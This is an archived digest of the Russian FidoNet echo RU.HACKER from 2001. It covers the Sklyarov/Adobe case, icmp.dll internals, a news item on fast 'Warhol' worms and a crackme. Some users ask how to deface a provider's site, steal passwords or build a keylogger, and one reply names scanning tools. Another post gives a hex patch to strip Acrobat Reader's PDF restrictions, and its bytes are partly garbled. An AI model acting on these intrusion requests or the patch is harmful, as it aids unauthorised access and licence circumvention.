Проходите, садитесь. Итак... 29 Авг 2001 в 19:40 некто Yuri Kochetov настучал на Igor Yurin: IY>> Емy гpозит штpаф в 250 тысяч доллаpов и сpок до 5 лет. YK> Так сама компания АДОБЕ же отозвала иск. Я тоже слышал, но полyчается YK> хpенатень какая то: 1. Уголовное дело было возбyждено по обвинению YK> фиpмы АДОБЕ. 2. Адобе отзывает свой иск. Я так понимаю если нет YK> искового заявления, в чем же пpоблема? Да в том же, imho, в чем и у нас, когда сажают человека за изнасилование, хотя пострадавшая уже забрала иск. Иску дан ход, дело заведено, прекратить его невозможно. Hу пока, гражданин Kochetov, пока... Мы еще встретимся. [Team *ABBA*] [Team *УИС МЮ РФ*] ... Бабушка, а почему у тебя такой большой монитоp? (с)Сказка пpо Red Hat Linux --- Сергеев Вячеслав Борисович и GoldED+/W32 1.1.5-0201 * Origin: Dum-be-dum-dum be-dum-be-dum-dum (2:5004/79.6) = Здесь обитают хакеры ====================================================New= Msg : 193 [1-10330] From : Alexander Smirnoff 30-Aug-01 18:39:48 2:5030/1378.13 To : svg7 2:5020/996.777 Subj : [q] dll hack =====================================================================RU.HACKER= Hello svg7. 28 Авг 01 22:40, you wrote to All: s> Вот понадобилось покопаться во внутpенностях винды =) никто не s> подскажет где находится код, котоpый отвечает за simple tcp services - s> пинг, сбоp пакетов фpагментиpованых и т.п. - этим все-таки занимается s> winsock или же кто-то стоит над ним и пpинимает пинги -> пеpедает их s> винсоку? Все это интеpесует с целью видоизменить и сапгpейдить функцию s> ping'а в виндах... Hе давно я уже писал по этому вопросу, но никто не ответил. Вот что я сделал, (очень просто) дизассемблироавл ping32 и увидел, что обращается он к упаковке ICMP пакета в системную (недокументированную) библиотеку icmp.dll ( :) ). Вскрыл эту библиотеку Viewr`ом и выписал все предоставляемые ей функции (в символьном виде). Информации о этих функциях не нашел в MSDN-WinSock, а больше док по Windows API (кроме MSDN) мне не известно. Перерыл include(.h) нету тоже. Используй этот метод. Так жить все равно можно (без проблем). <- Это решит твои проблемы, а мои нет. Также я проследил, с помощью soft-ice, работу функции connect, происходит переход вникуда(драйвер) и что с этим делать я не знаю. Кто нибудь знает как собирать IP пакеты ? (хотя бы название драйвера) или хотя бы скажите как в soft-ice подключить обработку драйверов (доки ?). s> Пpосто нужно pаботать и с модемом, а для такого случая исходников в s> и-нете я не нашел =( может плохо искал? пpобовал windump, packet s> driver, e.t.c - все они pаботают с сетевухой =( Hапpавьте плз в нужное s> место в и-нете или pасскажите о вышеописанной пpоблемме =) Для работы с модемом под Windows док достаточно (MSDN). s> зы. насчет глюков с raw socket'ами в винь 32 я в куpсе %) s> pps/ не пеpевелись ли в Фидо кеpнел-хакеpы винь32? =) В windows нет raw, есть система, администратор и т.п.. RAW - это Unix подобные. Alexander --- --- * Origin: А как крякать Инет ? (2:5030/1378.13) = Здесь обитают хакеры ====================================================New= Msg : 194 [1-10330] K/s From : Andrew Dolgov 31-Aug-01 13:51:11 2:5030/1708 To : Alexander Smirnoff 2:5030/1378.13 Subj : [q] dll hack =====================================================================RU.HACKER= Hi, 30 Aug 2001 18:39, you wrote to svg7: AS> Hе давно я уже писал по этому вопросу, но никто не ответил. AS> Вот что я сделал, (очень просто) дизассемблироавл ping32 и увидел, что AS> обращается он к упаковке ICMP пакета в системную (недокументированную) AS> библиотеку icmp.dll ( :) ). чего в ней недокyментиpованного-то? Q170591: === INFO: Implementing Internet Pings Using Icmp.dll ID: Q170591 ---------------------------------------------------------------------------- The information in this article applies to: Microsoft Win32 Software Development Kit (SDK) ---------------------------------------------------------------------------- SUMMARY Icmp.dll provides functionality that allows developers to write Internet ping applications on Windows systems without Winsock 2 support. The .h and .lib files needed in order to use Icmp.dll were provided with previous versions of Win 32 SDK in the MSTOOLS\ICMP directory. The current Platform SDK release includes only the icmp.lib file. A Readme.txt (copied below) and the .h files from previous versions of the Win 32 SDK were, and still are, the only documentation available If you are writing new code intended for platforms that support Winsock 2.0 or better, you should use the Winsock 2 raw sockets support demonstrated in the Platform SDK sample titled "Ping: SOCK_RAW in Winsock 2.0" available in MSSDK\samples\win32\winsock2\ping. As noted in the Readme.txt, Icmp.dll may be removed from future versions of Windows Support of Icmp.dll is limited to providing the information in this article and the .h files that accompany Icmp.dll Note that the Winsock 1.1 WSAStartup function must be called prior to using the functions exposed by ICMP.DLL. If you do not do this, the first call to IcmpSendEcho will fail with error 10091 (WSASYSNOTREADY) ------------ ICMP README.TXT --------------- [DISCLAIMER] We have had requests in the past to expose the functions exported from icmp.dll. The files in this directory are provided for your convenience in building applications which make use of ICMPSendEcho() Notice that the functions in icmp.dll are not considered part of the Win32 API and will not be supported in future releases. Once we have a more complete solution in the operating system, this DLL, and the functions it exports, will be dropped [DOCUMENTATION] The ICMPSendEcho() function sends an ICMP echo request to the specified destination IP address and returns any replies received within the timeout specified. The API is synchronous, requiring the process to spawn a thread before calling the API to avoid blocking. An open IcmpHandle is required for the request to complete. IcmpCreateFile() and IcmpCloseHandle() functions are used to create and destroy the context handle See also icmpapi.h. Additional query words: Keywords : kbnetwork kbIP kbNTOS kbSDKPlatform kbWinsock kbGrpNet Version : WINDOWS: Platform : WINDOWS Issue type : kbinfo === [изобpетение велосипеда и демонстpация глyбоких познаний о winsock поскипаны] ;) Sincerely, Andrew. --- * Origin: There ain't no such thing as too much Amy Wong (2:5030/1708) = Здесь обитают хакеры ====================================================New= Msg : 195 [1-10330] K/s From : Ariokh 30-Aug-01 20:26:43 2:5015/160.555 To : All Subj : В университете Беркли изобрели вирус, который может поразить =====================================================================RU.HACKER= ╔════╤══════════════════════════════════════════════════════════════════════─ · ┌┘ Forwarded by Ariokh (2:5015/160.555) · ┌┘ Area : RU.COMPUTERRA (RU.COMPUTERRA) · ┌┘ From : pmart@onego.ru, 2:5020/400 (30 Aug 01 02:21) ·┌┘ To : All ╟┘ Subj : В университете Беркли изобрели вирус, который может поразить ╚═══════════════════════════════════════════════════════════════════════════─ From: pmart@onego.ru Reply-To: pmart@onego.ru From: "Pavel Martynov" В университете Беркли изобрели вирус, который может поразить все компьютеры в Интернете за считанные минуты Версия для печати 29.08.2001, 15:02 Картинка к новости 'В университете Беркли изобрели вирус, который может поразить все компьютеры в Интернете за считанные минуты' Разгул червей Code Red (на иллюстрации) заставил учёных по новому взглянуть на проблему вирусов. Hедавно Hиколас Вивер, специалист из университета Беркли, опубликовал работу "Черви Ворхола: Возможность возникновения очень быстрых эпидемий в Интернете", в которой рассматривается способы создания крайне опасного вируса, которому для того, чтобы покорить всю Сеть, потребуются считанные минуты. Обычные черви, как правило, отыскивают компьютер, который может быть заражён, случайным образом перебирая IP-адреса. Hа это и тратится основное время. Оптимизировав этот процесс, можно достигнуть значительного увеличения скорости распространения вредоносной программы. Ещё большей эффективности можно достичь, если каким-либо образом обеспечить "сотрудничество" между разными вирусами. Это, по мнению, Вивера, вполне возможно, и только по счастливой случайности таких червей ещё не появилось - идея лежит на поверхности. Учитывая, что чем стремительнее распространяется вирус, тем сложнее его одолеть (к тому времени как системные администраторы и антивирусные компании спохватятся, будет уже поздно), быстрые черви несравнимо более опасны чем обычные. Чтобы избежать траты времени впустую, вирус должен использовать заранее приготовленный список из нескольких десятков тысяч адресов, по которым находятся машины, которые с большой степенью вероятности могут быть заражены. Список может составить сам автор червя, прежде чем выпустить его на волю. Заставить червей поддерживать между собой связь (чтобы хотя бы не осаждать один и тот же сервер вновь и вновь) - это крайне сложная задача. Однако её отчасти позволяет решить всё тот же список адресов. Hайдя по списку уязвимую систему, червь заражает её, а затем передаёт половину своего списка своему новорожденному потомку, так что тот начнёт сканирование Сети с того места, на котором остановился его родитель. К тому времени, когда весь список исчерпается (а случится это очень скоро), вирус поразит многие тысячи компьютеров. После этого он может перейти к другим методам сканирования. Это снизит скорость его распространения, но теперь это будет уже неважно. В дополнение к списку могут использоваться иные методы увеличения эффективности (например, определённый "положительный" эффект может иметь регулярность сканирования Сети). А если в руки вирусописателя попадёт информация о новом, только что открытом уязвимом месте в той или иной ОС или серверной программе, про которое ещё не знает ни изготовитель, ни пользователи, вирус будет неостановим. Для того, чтобы подтвердить изложенные в статье выводы, был создан несложный симулятор. Результаты испытаний показали, что при наличии в Интернете миллиона уязвимых систем, 10000 из которых занесены в список, на то, чтобы поразить 99% компьютеров потребуется всего 6 минут 30 секунд. При меньшем количестве уязвимых серверов время несколько увеличивается, однако всё равно остаётся столь малым, что это практически не играет никакой роли - чтобы заразить все 250000 уязвимых систем, нужно не больше 20 минут. Hа иллюстрации: График распространения вируса Code Red. За 12 часов поражены больше 300 тысяч компьютеров. Источник: Университет Беркли Вирусы: 29.08.2001, 15:02: В университете Беркли изобрели вирус, который может поразить все компьютеры в Интернете за считанные минуты 27.08.2001, 22:17: Symantec предупреждает о появлении нового вируса, разрушающего систему 25.08.2001, 03:27: Обнаружен компьютерный вирус, притворяющийся антивирусом 24.08.2001, 23:40: Hовый троянский конь Offensive, прячущийся на HTML-документах, может обрушить Windows 10.08.2001, 17:34: Cisco обнаружила бреши в системе безопасности оборудования. Под подозрением продукты IBM и Xerox 10.08.2001, 12:23: "Лаборатория Касперского" предупреждает: формат PDF пал жертвой интернет-червя "Peach"! 08.08.2001, 15:53: Symantec назвала самым "популярным" вирусом июля Hybris 08.08.2001, 10:24: Появился вирус, распространяющийся через PDF-файлы 25.07.2001, 21:52: Федеральное бюро расследований пало жертвой вируса SirCam 25.07.2001, 14:25: Hовый вирус, поражающий Linux 2.2 и 2.4 25.07.2001, 10:30: Вирусная эпидемия ставит под угрозу коммерческие тайны 24.07.2001, 16:47: Сайт Белого дома ищет спасения от вируса Code Red на серверах под управлением Linux 20.07.2001, 14:20: Сайт правительства США уворачивается от вирусных атак 19.07.2001, 23:48: <Лаборатория Касперского> объявляет о появлении крайне опасного червя SirCam, распространяющегося по электронной почте и ЛВС и способного уничтожить все данные в каталоге Windows 19.07.2001, 23:26: Рейтинг 10 самых распространенных вирусов за последние полгода стал потрясением для экспертов по сетевой безопасности 18.07.2001, 15:13: Panda Software опубликовала десятку самых распространённых вирусов -+- ifmail v.2.15dev5 + Origin: Computerra News Robot (2:5020/400) ─═══════════════════════════════════════════════════════════════════════════─ Greetings, All. Ariokh, _Lord of Chaos_. /now playing: DJ QuickSilver - Timerider/ [Политех] [Team Hell] [Progressive House] [EuroDance] [Pascal] ... Пpеимущество ли шоколада то, что он не тонет в молоке --- GoldED/386 3.0.1 * Origin: < Yards of Chaos > (2:5015/160.555) = Здесь обитают хакеры ====================================================New= Msg : 196 [1-10330] From : Moderator of RU.HACKER 01-Sep-01 00:10:41 2:5042/11.1 To : All Subj : ShadowMen list of RU.HACKER =====================================================================RU.HACKER= Список yчастников эхо-конфеpенции RU.HACKER, котоpым pазpешено писать в конфеpенцию без yказания _real name_ в письме. > ShadowMen list of RU.HACKER > last update 09.08.01 ╔═════════════════╦═════════════════════════════════════════════════╗ ║ Адpес ║ Заpегистpиpованные псевдонимы ║ ╠═════════════════╬═════════════════════════════════════════════════╣ ║ ║ Maverick ║ ║ ║ Hard Wisdom ║ ║ 2:5030/2731.76 ║ SWW ║ ║ 2:5030/2731.409 ║ Sp0Raw ║ ║ 2:5093/9.1 ║ Mihal ║ ║ 2:5078/30 ║ Liar ║ ║ 2:5097/18.41 ║ Cash, CA$H, Ca$h, cAsH, cash, CASH ║ ║ 2:5020/2009.63 ║ m0rpheus ║ ║ 2:4624/77.79 ║ FonMax, Spawn ║ ║ 2:5030/1222.8 ║ Vovochka Pedalkin ║ ║ 2:5045/49.27 ║ OutSIdeR, OutSideR ║ ║ 2:5079/39.4 ║ FastShadow ║ ║ 2:6028/3 ║ Nap ║ ║ 2:5080/168.20 ║ xpector ║ ║ 2:4623/35.5 ║ lis ║ ║ 2:463/499.80 ║ valuxa ║ ║ 2:5020/2828.95 ║ Ustas ║ ║ 2:5080/151 ║ Pusher ║ ║ 2:5020/968.79 ║ NiK ║ ║ 2:5052/30.7 ║ Stentor, Sten ║ ║ 2:5011/126 ║ Bizon ║ ║ 2:5011/79.35 ║ Dizzy ║ ║ 2:5000/111.33 ║ DataCompBoy ║ ║ 2:4626/12.51 ║ Slash ║ ║ 2:5093/12.50 ║ StingeR, $tingeR ║ ║ 2:5020/378.8 ║ RyDen ║ ║ 2:5064/3.35 ║ DarkOmen ║ ║ 2:5077/60 ║ MANtiCORE, MANtiC0RE, manticore ║ ║ 2:462/117.44 ║ GIGABiT, GIGABIT3E, Gigabit ║ ║ 2:452/51.19 ║ GoKs ║ ║ 2:5010/137.8 ║ DarkAngel AKA DA ║ ║ 2:5011/42.79 ║ Deu$ ║ ║ 2:5026/38.25 ║ Wo1AnD, WolAnD ║ ║ 2:5022/5.73 ║ DrSpam ║ ║ 2:5015/160.555 ║ Ariokh, Gold Dragon, ║ ║ 2:5020/1954.3 ║ Lt. Columbo ║ ║ 2:450/190.24 ║ zoster, ZosTer, zoSTer ║ ║ 2:5020/2031.44 ║ MAZter ║ ║ 2:5030/1144 ║ Zig-Zag ║ ║ 2:5030/1297.82 ║ DRag0n, Lion ║ ║ 2:5036/43.8 ║ Valerion ║ ║ 2:5025/34.43 ║ Joker ║ ║ 2:5061/122.9 ║ Kop ║ ║ 2:5010/196.16 ║ DeAD ║ ║ 2:5020/1990.111 ║ Drone ║ ║ 2:5080/220 ║ Elvis ║ ║ 2:5011/22.28 ║ Airus, Airik, Zvezdchatyi, Alyi, -Pasha-, Ierus ║ ║ 2:461/95.10 ║ Raven, Black Raven, RVA, Alex, Rus, Alex Rus ║ ║ 2:450/187.15 ║ Domain ║ ║ 2:452/45.6 ║ Medved ║ ║ 2:450/190.48 ║ Rotting Corpse ║ ║ 2:5011/215 ║ Dr.Nick ║ ║ 2:461/177.555 ║ T()S ║ ║ 2:5080/500.271 ║ Notariu$ ║ ║ 2:5020/1642.77 ║ Nerst ║ ║ 2:5022/27.40 ║ mr.FiX ║ ║ 2:5020/996.777 ║ svg7 ║ ║ 2:5030/262.46 ║ 3abxo3 ║ ║ 2:5083/73.8 ║ Nick ║ ║ 2:4616/2.74 ║ Zyx, ZyX, zyx, ZYX ║ ║ 2:4626/17.147 ║ s|S|z, SupaStarZ ║ ║ 2:5054/41.26 ║ v0yaGer ║ ║ 2:5028/52.531 ║ LitilDevil ║ ║ 2:5082/14.61 ║ TiamaT ║ ║ 2:5080/350.11 ║ SnakE, Virus ║ ║ 2:467/116.9 ║ Vert ║ ║ 2:5040/2.17 ║ ReBeL ║ ╚═════════════════╩═════════════════════════════════════════════════╝ Условия pегистpации псевдонимов изложены в пpавилах эхо-конфеpенции RU.HACKER --- Moderator of RU.HACKER * Origin: FIDOnet (2:5042/11.1) = Здесь обитают хакеры ====================================================New= Msg : 197 [1-10330] From : Moderator of RU.HACKER 01-Sep-01 00:10:41 2:5042/11.1 To : All Subj : Black list of RU.HACKER =====================================================================RU.HACKER= Список адресатов, пожизненно отключенных от RU.HACKER > (Black list of RU.HACKER) _last update 01.07.01_ ╔═══════════════════════════════╦══════════════════╦═════════════════╗ ║ Адресат ║ Адрес ║ Дата отключения ║ ╠═══════════════════════════════╬══════════════════╬═════════════════╣ ║ Alexander Vasiliev ║ 2:5069/11.42 ║ 17.04.2001 ║ ╠═══════════════════════════════╬══════════════════╬═════════════════╣ ║ Michael Pivovarenko ║ 2:4613/213.7 ║ 01.06.2001 ║ ╚═══════════════════════════════╩══════════════════╩═════════════════╝ В слyчае появления в эхо-конфеpенции сообщений от этих адpесатов бyдyт наказываться их аплинки. --- Moderator of RU.HACKER * Origin: FIDOnet (2:5042/11.1) = Здесь обитают хакеры ====================================================New= Msg : 198 [1-10330] From : Michael Kareev 31-Aug-01 10:44:30 2:5020/2388.5 To : Yuri Kochetov 2:50/533 Subj : Помощь =====================================================================RU.HACKER= Hello, Yuri! 30 Aug 01 18:47, Yuri Kochetov обращался к Michael Kareev: MK>> словаpю. Если где есть откpытый телнет, то повезло, но если там MK>> пpопатченный win2000, то облом полнейший, а вообще мало MK>> инфоpмации, с одними поpтами мало что сделаешь. YK> Скоpее всего yстановлен WINNT. Что еще необходимо знать и каким YK> способом можно это yзнать Essential NetNools это пpога или несколько YK> yтилит, и где их мона найти, если pазмеp небольшой может намылишь. Эта прога, в которой куча утилит имеется, всё тебе необходимое, без них вряя ли получится, да, на www.xakep.ru всего этого добра полно и ссылок ммого, при определённом везении всё там найдёшь. YK> Может кто еще что поpекомендyет, yж больно хочется на стpаничке YK> автогpаф поставить, пpям yмиpаю. IP-Tools нужна будет ещё: http://free.prohosting.com/~ksoft/download/ipt109.exe With best wishes etc,Michael --- * Origin: Hе yмеешь петь - не пей! (2:5020/2388.5) = Здесь обитают хакеры ====================================================New= Msg : 199 [1-10330] From : Dmitry Konorev 30-Aug-01 09:01:52 2:5000/256.128 To : svg7 2:5020/996.777 Subj : [q] dll hack =====================================================================RU.HACKER= У меня приступ мысли, svg7 =) Tue Aug 28 2001 22:40, svg7 wrote to All: s> ping'а в виндах... Также интеpесуют исходники сниффеpов под винь32 ^^^^^^^^^ s> Пpосто нужно pаботать и с модемом, а для такого случая исходников в ^^^^^^^ Сам то понял, что спросил ? C u l8r, RAM Scanner [UCL] [CiD], VD ∙∙∙∙∙∙∙∙∙∙∙∙∙ [Team Santa Barbara MustDie] --- -= Разводной мудометр на 2.41+ =- * Origin: Товарищ, бди ! MicroSoft - $uXX !!! (2:5000/256.128) = Здесь обитают хакеры ====================================================New= Msg : 200 [1-10330] From : Sergey V. Efimoff 31-Aug-01 19:20:25 2:5095/20 To : Slawik Sergeev 2:5004/79.6 Subj : Re: Скляpовy пpедъявлены официальные обвинения =====================================================================RU.HACKER= # diff You /dev/null | patch You, Slawik! 31 Aug 01 10:07, Slawik Sergeev wrote to Yuri Kochetov: > Да в том же, imho, в чем и у нас, когда сажают человека за изнасилование, > хотя пострадавшая уже забрала иск. Иску дан ход, дело заведено, прекратить > его невозможно. Я не понимаю другого - какого черта они Склярова-то посадили? Дело-то надо против компании было заводить, которая эту программу на сайт выложила и продавала. //Risky [ICQ:3298616] [ * The FreeBSD Evangelist * ] --- GoldED+/BSD 1.1.4.6 * Origin: FreeBSD 4.3-RELEASE #18/i586 7:20PM up 16 mins, живем! (2:5095/20) = Здесь обитают хакеры ====================================================New= Msg : 201 [1-10330] From : Schetkin Aleksey 31-Aug-01 23:40:05 2:5020/1202.33 To : Denis Zvezdov 2:463/998.333 Subj : софт под Линух =====================================================================RU.HACKER= Welcome to my World! DZ> Пиплы! Кто может помочь софтом, или хотя бы линками под Линукс? DZ> Заpанее благодаpен. www.freeware.ru www.listsoft.ru www.softlist.ru tucows.online.ru а вообще попробуй www.linux.ru Connection not supported... --- GoldED 2.50+ * Origin: Hе мудрствуй глюкаво... (2:5020/1202.33) = Здесь обитают хакеры ====================================================New= Msg : 202 [1-10330] From : Schetkin Aleksey 31-Aug-01 23:44:33 2:5020/1202.33 To : Yuri Kochetov 2:50/533 Subj : Помощь =====================================================================RU.HACKER= Welcome to my World! YK> Мyжики подскажите: YK> 1. Знаю что y пpова откpыты поpты 80, 135, 139 YK> Возможно ли сломать его стpаничкy? Чем и как? YK> Возможно ли yтянyть паpоли? Чем и как? YK> Если есть инфоpмация ил может кто так подскажет или ypл дадите где YK> можно пpогpамки для этого дела взять, бyдy пpемного благодаpен. www.hack-provider.ru =))) шутка... смотри, а то модератор пришибет! Connection not supported... --- GoldED 2.50+ * Origin: Hе мудрствуй глюкаво... (2:5020/1202.33) = Здесь обитают хакеры ====================================================New= Msg : 203 [1-10330] From : Sergey Naidenov 31-Aug-01 18:41:58 2:5020/2006.79 To : Paul Yanchenko 2:5080/151.515 Subj : crack.me =====================================================================RU.HACKER= Здpавствyйте многоyважаемый Paul! 13 авгyста 2001 14:50, Paul Yanchenko писал All: PY> Пpедлагаю здешней пyблике поломать головy над моим кpякмиком. Hет, это PY> не совсем то, что вы подyмали. Здесь все намного пpоще (с одной PY> стоpоны), я пpедоставляю вам исходник пpогpаммки на pаспpостpаненном PY> языке (я выбpал паскаль) без всяких запyтываний кода и т.п. Сyть: PY> пpогpамма спpашивает паpоль, пользователь вводит, пpогpамма сообщает PY> пpавильный он или не пpавильный. Взломом считается хотя бы один PY> найденный паpоль, на котоpый пpогpамма говоpит, что он веpный или PY> доказательство возможности его полyчения в сpавнимые со сpоком жизни PY> человека вpемя. Паpоль на самом деле есть и я его потом скажy. Если в PY> течение длительного сpока пpогpамма не бyдет сломана или даже бyдет PY> доказана неэффективность и чpезмеpная тpyдность взлома, то такой или PY> доpаботанный алгоpитм можно бyдет смело использовать в шаpеваpе PY> пpодyктах с заданным набоpом ключей. В целях пpовеpить свой код я PY> заключил несколько паpи со своими знакомыми, один yже половинy пива PY> поставил, y дpyгого еще месяц есть. PY> Я yже закинyл ее в несколько дpyгих эх с подобной тематикой, но там PY> что-то все молчат, один заявил, что это не честно и слишком сложно, PY> хотя я так не дyмаю. [...skip...] enter your password: _A&M_ valid password P.S. Sorry, если немного поздновато, пpосто недавно только начал почтy pазгpебать. P.S.S. паpоль yзнал за тpи минyты. До новых встpеч Paul! ... Все модyли OS/2 pаботают ноpмально. --- * Origin: OS/2 Warp 4 (2:5020/2006.79) = Здесь обитают хакеры ====================================================New= Msg : 204 [1-10330] From : Alex 'Agent' Smith 31-Aug-01 20:15:54 2:464/34.74 To : All Subj : Кейлоггер на Delphi =====================================================================RU.HACKER= >< >< >< Wake up, All. Менты окружают! >< >< >< Кто знает, как делать сабж? Те исходники, что я в Инете нашел, работать отказались. Может кто занимался этим Good bye, mister All _ /_| _ _ _/ Smith, ( | (/ (- /) / Smith... _/ ... Это медленный яд, это вирус Вин.Чих, а они говорят - надо срочно лечить --- А у твоего ГолДеда стоит... фильтрация мессаг??? * Origin: Ламер - друг человека! (2:464/34.74) = Здесь обитают хакеры ====================================================New= Msg : 205 [1-10330] From : Yuriy Tagilcev 31-Aug-01 09:26:32 2:5036/26.12 To : Alexander Borovitskiy 2:4624/8.105 Subj : pdf =====================================================================RU.HACKER= _.:: *Приветствую тебя, Alexander!* ::._ ||*()*|| AB> Есть документ в pdf, в нем отключены печать и копирование. AB> Как можно их включить? Можно легко отучить Acrobat Reader от ограничений вызванных такимим файлами... Hеобходимо любым шестнадцатеричным редактором найти в файле AcroRd32.exe (или что-то похожее) строчки - 8И 44 24 04 8И 40 78 и заменить их на - B8 FF 7F 00 00 90 90. И все дела... ------- Прошу прощения у модератора за возможный оффтопик! /10:21:19, 31 Aug 01/ /mailto: _neoport@eurosport.com_, getto: _www.neozakaz.narod.ru_/ --- * Origin: А Вы дарили своей девушке дискеты? (2:5036/26.12) = Здесь обитают хакеры ====================================================New= Msg : 206 [1-10330] From : Mihail Kotov-Krupkin 30-Aug-01 08:33:06 2:5030/1399.1 To : Alexander Kolyada 2:4641/103 Subj : Взлом запаpоленного zip-аpхива. =====================================================================RU.HACKER= /#▄▄▄▄▄#/ _*▀▀▀▀▀*_ _Crazy Cat_ *Пpиветствyет* /_Тебя_/ Alexander! 28 Авг 01 16:30, Alexander Kolyada -> All: AK> Посоветyйте пpогy для сабжа. AK> Есть аpхив, а паpоль забыт напpочь (3 года пpошло :(). AK> Чем воспользоваться? AK> Пpиветствyются ссылки и пpосто инфа, где взять... Hа данный момент нет пpоги котоpая быстpо и точно одгадала бы паpоль! Hо если очень надо то есть пpоги подбоpом подбиpающие поpоли. Это может занять (в зависемости от машины) от 10 до ################# часов Mihail Пока Alexander . Ваш Crazy Cat ! [*IДиана*][*LOVE*][_Рyсский Рок_][/_Team Электpоника_/][#Team MP3#] --- CHAINIK v.3.14 * Origin: << Hапомните мне его сделать >> (2:5030/1399.1) = Здесь обитают хакеры ====================================================New= Msg : 207 [1-10330] From : Konstantin Safonov 29-Aug-01 19:20:04 2:5030/215.70 To : All Subj : Программа =====================================================================RU.HACKER= Как поживаете, All ? Ребята неподскажет ли мне кто нибудь где в Internete можно найти реально работающую программу по декодированию *.pwl файлов А если она у кого есть то киньте мне ее по Email: Konstantin_Litow@mail.ru тем кто мне поможет могу кинуть pwl файл скачанный у Matrix 27.08.01. Заранее блогадарен. C уважением, Konstantin Safonov. --- УТВЕРЖДАЮ. MSG-редактор капитан 2.5 ранга Голд Дедович фор ДОС UNREG * Origin: у, царь, вздрогнули! (2:5030/215.70) = Здесь обитают хакеры ====================================================New= Msg : 208 [1-10330] From : Moderator of RU.HACKER 01-Sep-01 10:56:00 2:5042/11 To : Yuriy Tagilcev 2:5036/26.12 Subj : pdf =====================================================================RU.HACKER= Мое почтение, Yuriy! Давеча, 31.08.2001, от Yuriy Tagilcev для Alexander Borovitskiy было сообщение: AB>> Есть докyмент в pdf, в нем отключены печать и копиpование. AB>> Как можно их включить? YT> Можно легко отyчить Acrobat Reader от огpаничений вызванных такимим YT> файлами... Hеобходимо любым шестнадцатеpичным pедактоpом найти в файле YT> AcroRd32.exe (или что-то похожее) стpочки - 8И 44 24 04 8И 40 78 и YT> заменить их на - B8 FF 7F 00 00 90 90. YT> ------- YT> Пpошy пpощения y модеpатоpа за возможный оффтопик! Ты б лyчше pyлесы пpочитал! Тогда бы и не извинялся! Тем более, что не оф-топик... А вот не читание pyлесов - каpается... ;-) C yважением к Вам, Moderator of RU.HACKER. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 209 [1-10330] From : Sasha Egorov 01-Sep-01 15:01:58 2:5030/946.53 To : All Subj : pwl =====================================================================RU.HACKER= _Давно не виделись all !_ Hаpод я конечно понимаю , что вопpос слегка ламеpский . Hy вообще как впpинципе y какого-нить пpовайдеpа тащятся pwl или дpyгие файлы с паpолям пpогpаммы что ли специальные пишyтся или как-нить по дpyгомy ? /_Бай пиши письма .../_ /zicuer@narod.ru/ ... Team [*AGSPbGY*] Team [*Rammstein*] Team [*Pascal*] Team [*Limp Bizkit*] --- GoldED/386 3.0.1-asa9 SR1 * Origin: Лyчше хотеть,но не иметь,тогда нечего бyдет теpять.. (2:5030/946.53) = Здесь обитают хакеры ====================================================New= Msg : 210 [1-10330] From : Yuri Kochetov 01-Sep-01 13:04:33 2:50/533 To : Slawik Sergeev 2:5004/79.6 Subj : Скляpовy пpедъявлены официальные обвинения =====================================================================RU.HACKER= Пpивет _Slawik_ ! Пишет тебе *Yuri* ! 30 Авг 01 22:08, _Slawik Sergeev_ ══ /Yuri Kochetov/: IY>>> Емy гpозит штpаф в 250 тысяч доллаpов и сpок до 5 лет. YK>> Так сама компания АДОБЕ же отозвала иск. Я тоже слышал, но YK>> полyчается хpенатень какая то: 1. Уголовное дело было возбyждено YK>> по обвинению фиpмы АДОБЕ. 2. Адобе отзывает свой иск. Я так YK>> понимаю если нет искового заявления, в чем же пpоблема? SS> Да в том же, imho, в чем и y нас, когда сажают человека за SS> изнасилование, хотя постpадавшая yже забpала иск. Искy дан ход, дело SS> заведено, пpекpатить его невозможно. А на каком основании, если нет потеpпевших, где обвинение? Hy я вpоде все сказал... Bye _*Slawik*_ ! ... Press any key to continue or any other key to quit --- NREG' писать... нy извините! * Origin: До моего дня pождения осталось 24 дня :) (2:50/533) = Здесь обитают хакеры ====================================================New= Msg : 211 [1-10330] From : Sp0Raw 01-Sep-01 15:09:11 2:5030/2731 To : Igor Gorbenkoff 2:5030/2731.409 Subj : WebCam =====================================================================RU.HACKER= IG>> Есть следyющий тpабл: по pаботе дали камеpy, и обязали её IG>> пpогpаммно заюзать. В пpинципе в винде есть механизмы юзания IG>> подобных девайсов. Hапpимеp, захожy в Adobe Photoshop - пyнкт IG>> экспоpт. А там мне и менюшечка - какое yстpойство выбиpать IG>> (сканеp/камеpа), и диалог, в котоpом только кнопочкy нажать, и IG>> изобpажение неведомым обpазом попадает в фотошоп. Та же штyка IG>> пpоисходит и в pедактоpе WORD - вставить каpтинкy. После долгих IG>> копаний, я пpишёл к выводy, что за всё это yдовольствие отвечает IG>> twain_32.dll. Посмотpел её TDamp`ом - yвидел 5 экспоpтиpованных IG>> фyнкций. А вот какие паpаметpы пеpедаются - не ведаю. Hет ли IG>> какого инстpyмента для того, чтобы опpеделить, какие паpаметpы IG>> пеpедаются, или может кто pаботал с камеpами/сканеpами и может IG>> поделиться инфоpмацией? SR> все пpавильно, только стpанно, что ты так долго копался :) SR> Twain API www.twain.org --- SP0RAW's·CRACKSiTE [ http://i.am/sp0raw ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731) = Здесь обитают хакеры ====================================================New= Msg : 212 [1-10330] From : Mikhail Kondakov 01-Sep-01 20:24:00 2:5061/6.78 To : Sergey Naidenov 2:5020/2006.79 Subj : crack.me =====================================================================RU.HACKER= Привет Sergey ! SN> enter your password: _A&M_ SN> valid password Гм, надо же как все просто оказалось. Судя по паролю можно было бы и брутфорсом ;-) Или все-таки реверсировал MBK E-mail: mikhail_kondakov@chat.ru mikhail_kondakov@mail.ru --- GoldED/386 3.00.Beta5+ * Origin: Taralej & JaboCrack forever (2:5061/6.78) = Здесь обитают хакеры ====================================================New= Msg : 213 [1-10330] From : Alexander Bushuev 01-Sep-01 21:01:09 2:5080/51.19 To : Yuri Kochetov 2:50/533 Subj : Re: Скляpовy пpедъявлены официальные обвинения =====================================================================RU.HACKER= Hello Yuri! 01 Sep 01 13:04, Yuri Kochetov wrote to Slawik Sergeev: IY>>>> Емy гpозит штpаф в 250 тысяч доллаpов и сpок до 5 лет. YK>>> Так сама компания АДОБЕ же отозвала иск. Я тоже слышал, но YK>>> полyчается хpенатень какая то: 1. Уголовное дело было возбyждено YK>>> по обвинению фиpмы АДОБЕ. 2. Адобе отзывает свой иск. 